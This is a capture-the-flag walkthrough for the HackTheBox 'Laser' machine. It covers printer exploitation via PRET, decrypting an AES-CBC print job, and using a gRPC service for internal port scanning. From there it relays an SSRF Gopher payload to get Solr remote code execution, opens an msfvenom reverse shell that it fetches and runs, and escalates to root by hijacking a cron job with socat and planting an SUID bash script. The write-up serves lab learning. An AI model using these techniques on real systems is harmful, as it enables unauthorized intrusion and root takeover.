Introduction
We covered a difficult printer-exploitation scenario. We first interacted with an HP JetDirect printer listening on port 9100 through the printer exploitation framework PRET. We discovered a print job file encrypted with AES-CBC and recovered the decryption key using PRET's `nvram dump` command. The decrypted file was a PDF documenting a service named Feed Engine running on port 9000. To interact with the service, we used the gRPC tools and wrote a client script that sends requests to the Feed Engine server. We used this client to probe for other internally open ports and discovered an Apache Solr installation, for which we found an exploit and obtained the first shell. Privilege escalation was achieved by exploiting a periodically running task that exposes the SSH password and copies files from the machine into a Docker container. This was part of HackTheBox Laser.
Initial Enumeration & Printer Interaction
I started with an `nmap` scan that revealed open ports, including 22 (SSH), 9000, and, most importantly, 9100 (JetDirect, a printer port). Recognizing this, I used the `pret` framework to interact with the printer. I connected to it using PJL (Printer Job Language) by running `pret <IP_ADDRESS> <PORT> pjl`. Inside `pret`, I used `ls` to list files and found a `jobs` directory and a file named `queued`. I downloaded this `queued` file to my local machine using `get queued`, and `file queued` identified it as "ASCII text."
- Commands:
    - `nmap <target_ip>`
    - `pret <IP_ADDRESS> <PORT> pjl`
    - `ls` (within pret)
    - `get queued` (within pret)
    - `file <filename>`
Decoding and Decrypting the `queued` File
The `queued` file looked like base64-encoded data, but a simple `base64 -d` didn't work: the string was wrapped in Python byte-string markers, and the decoded output was still encrypted. I manually removed the markers (the leading `b'` and the trailing single quote) from a copy of the file. Then I decoded it with `cat queued_modified_base64 | base64 -d > queued_decoded`, but `file queued_decoded` still returned "data," suggesting encryption. Viewing the hex header with `xxd queued_decoded` didn't help either.
To figure out the encryption, I reconnected to the printer with `pret` and used the `env` command to check environment variables. I found `LPARM: ENCRYPTION_MODE=AES_CBC`, confirming AES-CBC encryption. Keys like this are often stored in the printer's memory, so I used the `nvram dump` command in `pret` to retrieve the encryption key.
With the key and the encrypted file, I wrote a Python script to perform AES-CBC decryption. The script read the `queued` file, base64-decoded it, took the Initialization Vector (IV) from the first 16 bytes, and then used the retrieved key to decrypt the ciphertext, writing the decrypted content to a new file named `q_decrypted.pdf`.
- Commands:
    - `cat <filename> | base64 -d > <outputfile>`
    - `xxd <filename>`
    - `env` (within pret)
    - `nvram dump` (within pret)
Interacting with the Feed Engine Service (Port 9000)
The decrypted PDF contained guidelines for a service called "Feed Engine" running on port 9000. The documentation specified using "protocol buffers and the gRPC framework" with an RPC method `FeedNote` that takes `Content` and returns `Data`. A successful transmission would show "pushing feeds."
To use gRPC, I first installed the necessary tools: `sudo python3 -m pip install grpcio-tools --break-system-packages`. I then created a `.proto` file (e.g., `laser.proto`) to define the service and message types, following the gRPC documentation. I used the gRPC tools to generate Python stub files from the `.proto` file: `python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. laser.proto`.
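The `.proto` file can be sketched along these lines. The service name is inferred from the generated `PrintServiceStub`, and the method signature comes from the PDF; the field names and numbers inside the messages are assumptions:

```proto
// laser.proto -- sketch; message field names/numbers are assumptions.
syntax = "proto3";

service PrintService {
  rpc FeedNote (Content) returns (Data) {}
}

message Content {
  string data = 1;
}

message Data {
  string feed = 1;
}
```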
Finally, I wrote a Python client script, importing the generated stub files and `grpc`. The client script created a gRPC channel to the printer's feed engine at `printer.laser.internal:9000` and then created a stub using the generated `PrintServiceStub`. I initially tested by pointing the client at my own machine with a `netcat` listener to observe the raw request, and then successfully connected to the printer's port 9000.
- Commands:
    - `sudo python3 -m pip install grpcio-tools --break-system-packages`
    - `python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. laser.proto`
    - `nc -lvnp <port>`
Port Scanning via gRPC and Discovering Apache Solr
I modified the gRPC client script to act as a port scanner. It looped through a list of ports, attempting to send a request to `localhost:<port_number>` via the feed engine on port 9000. If the response contained "pushing feeds," it indicated an open port on the target machine (from the printer's perspective). This scan revealed that port 8983 was open and returned "pushing feeds." Research confirmed that port 8983 is associated with Apache Solr.
Exploiting Apache Solr for Remote Code Execution
I identified the Apache Solr version as 1.4, which has a known RCE (Remote Code Execution) exploit. The standard exploit involves listing cores via `/solr/admin/cores` and then modifying a core's configuration. The PDF documentation mentioned a "staging" core for the feed engine, which was my target.
Due to the limitations of interacting through the gRPC feed engine, I couldn’t use the exploit directly. I needed to craft a request that the feed engine could relay. I decided to use the Gopher protocol to send the malicious payload to Apache Solr via the feed engine.
I created a Python script that constructed a Gopher URL targeting `localhost:8983/solr/staging/config`. The payload aimed to modify the Solr config to execute commands. I created a reverse shell payload using `msfvenom` (e.g., `shell.elf`). The script would instruct Solr to download this `shell.elf`, make it executable, and run it.
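The Gopher URL construction can be sketched like this. The request shown is illustrative (the real payload POSTed the config modification to `/solr/staging/config`); the underscore after the port is a dummy Gopher item type:

```python
# Build a gopher:// URL that smuggles raw bytes (here, an HTTP request)
# to a TCP service -- the feed engine then relays it to Solr on 8983.
from urllib.parse import quote

def gopher_url(host, port, raw_request):
    # Everything after "/_" is URL-decoded by the gopher handler and
    # written verbatim to the target socket.
    return f"gopher://{host}:{port}/_" + quote(raw_request)

# Illustrative request -- the actual exploit carried the JSON body that
# modifies the staging core's config to enable command execution.
example = gopher_url("localhost", 8983,
                     "GET /solr/admin/cores HTTP/1.1\r\n\r\n")
```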
I ran this exploit script using `python2` (due to `python3` URL library issues). I set up a `netcat` listener (`nc -lvnp 4545`) and successfully received a shell as the "solar" user, then grabbed the user flag.
- Commands:
    - `msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f elf -o shell.elf`
    - `nc -lvnp <port>`
Privilege Escalation
To stabilize the shell, I generated an SSH key pair on my attacker machine using `ssh-keygen`. I then copied my public key into `/var/solar/.ssh/authorized_keys` on the target machine, set the correct permissions with `chmod 600` and ownership with `chown solar:solar`, and logged in via SSH: `ssh -i <private_key_file> solar@<target_ip>`.
- Commands:
    - `ssh-keygen`
    - `echo "<public_key>" > /var/solar/.ssh/authorized_keys`
    - `chmod 600 /var/solar/.ssh/authorized_keys`
    - `chown solar:solar /var/solar/.ssh/authorized_keys`
    - `ssh -i <private_key_file> solar@<target_ip>`
Next, I uploaded `pspy64` (a process-monitoring tool) to the `/tmp` directory on the target. Running `./pspy64` revealed a cron job frequently executing `sshpass -p <password> scp ...` commands. These commands were transferring files from the "solar" machine to another internal IP (likely a Docker container) as root, using a hardcoded password. One of the transferred files was `/tmp/clear.sh`.
- Commands:
    - `wget http://<attacker_ip>:<port>/pspy64`
    - `chmod +x pspy64`
    - `./pspy64`
I used the discovered password with `sshpass` to SSH into the internal IP as root: `sshpass -p '<password>' ssh root@<internal_docker_ip>`. This confirmed it was a Docker container.
- Command:
    - `sshpass -p '<password>' ssh root@<internal_docker_ip>`
My privilege escalation strategy involved:

- On the Docker container, I stopped the SSH service: `service ssh stop`. This was to prevent the legitimate `clear.sh` from being overwritten by the cron job.
- I uploaded `socat` (a relay tool) to the "solar" machine. I downloaded a static binary of `socat` and used `wget` on the solar machine to fetch it from a Python HTTP server on my attacker machine.
- On the "solar" machine, I ran `socat` to listen on the Docker container's IP and port 22, forwarding to the solar machine's own SSH service. This effectively made the solar machine impersonate the Docker SSH endpoint for the cron job.
- On the "solar" machine, I created a malicious `/tmp/clear.sh` script. This script would copy `/bin/bash` to `/tmp/rootbash` and then set the SUID bit on it: `chmod +s /tmp/rootbash`.
- When the cron job ran, it was redirected by `socat` to my controlled SSH listener on the "solar" machine. Since the cron job runs as root and executes `clear.sh` on the destination after copying, my malicious `/tmp/clear.sh` was executed as root.
- This created `/tmp/rootbash` with the SUID bit set. I then executed `/tmp/rootbash -p` to get a root shell and finally retrieved the root flag.
- Commands:
    - `service ssh stop` (on Docker)
    - `wget http://<attacker_ip>:<port>/socat`
    - `chmod +x socat`
    - `./socat TCP-LISTEN:22,fork,reuseaddr TCP:<solar_machine_lan_ip>:2222` (example; actual usage may vary based on the specific redirection needed)
    - `printf '#!/bin/bash\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash\n' > /tmp/clear.sh` (`printf` is used because a plain `echo '\n'` would not expand the newlines)
    - `chmod +x /tmp/clear.sh`
    - `/tmp/rootbash -p`
This machine involved several layers, from printer interaction and custom protocol communication with gRPC to exploiting a known vulnerability and finally a creative cron job manipulation for privilege escalation.